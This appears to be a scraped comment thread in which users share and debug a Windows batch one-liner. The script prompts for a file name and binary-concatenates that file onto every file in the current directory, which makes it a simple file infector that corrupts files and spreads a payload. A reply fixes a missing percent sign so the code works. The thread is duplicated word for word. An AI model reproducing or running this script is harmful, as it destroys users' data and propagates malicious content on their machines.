@echo off & set/p "infectfile=[FILENAME]:" & for /f %%i in ('dir /b') do copy /b "%infectfile"+"%%i" "%%i"
three commands in batch, but same output
nate0person 1 year ago
@nate0person forgot the second % in the var %infectfile%
@echo off & set/p "infectfile=[FILENAME]:" & for /f %%i in ('dir /b') do copy /b "%infectfile%"+"%%i" "%%i"
Lol i luv ur screen name
wonkerjk 1 year ago
@echo off & set/p "infectfile=[FILENAME]:" & for /f %%i in ('dir /b') do copy /b "%infectfile"+"%%i" "%%i"
three commands in batch, but same output
nate0person 1 year ago
@nate0person forgot the second % in the var %infectfile%
@echo off & set/p "infectfile=[FILENAME]:" & for /f %%i in ('dir /b') do copy /b "%infectfile%"+"%%i" "%%i"
nate0person 1 year ago
Lol i luv ur screen name
wonkerjk 1 year ago